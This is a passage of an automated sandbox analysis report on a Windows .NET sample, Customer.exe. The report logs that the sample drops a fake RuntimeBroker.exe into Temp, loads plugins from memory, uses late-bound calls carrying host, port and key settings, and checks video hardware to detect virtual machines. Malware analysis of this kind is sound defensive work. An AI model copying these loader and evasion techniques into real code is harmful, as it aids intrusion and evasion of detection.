            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Customer.exeAutomated click: OK
            Source: C:\Users\user\Desktop\Customer.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Customer.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Customer.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Customer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: RuntimeBroker.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: RuntimeBroker.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: RuntimeBroker.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: Customer.exe, MainModuleUI.cs.Net Code: Prompt
            Source: RuntimeBroker.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: RuntimeBroker.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: RuntimeBroker.exe.0.dr, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\Customer.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline"
            Source: C:\Users\user\Desktop\Customer.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline"Jump to behavior
            Source: C:\Users\user\Desktop\Customer.exeCode function: 0_2_00007FFD9B86D2A5 pushad ; iretd 0_2_00007FFD9B86D2A6
            Source: C:\Users\user\Desktop\Customer.exeCode function: 0_2_00007FFD9B99252D push ebx; iretd 0_2_00007FFD9B99253A
            Source: C:\Users\user\Desktop\Customer.exeFile created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Users\user\Desktop\Customer.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Customer.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Customer.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Customer.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\E1B2CB22E28A5BBD6CDA 2B68AA9F0FB6B49ADC1A2ECFDCFEACE1787DFD06CD6D1CF17DF3884137FE32E8Jump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Customer.exeMemory allocated: 14A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeMemory allocated: 1AF50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMemory allocated: 19D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMemory allocated: 1B3A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Customer.exeWindow / User API: threadDelayed 6055Jump to behavior
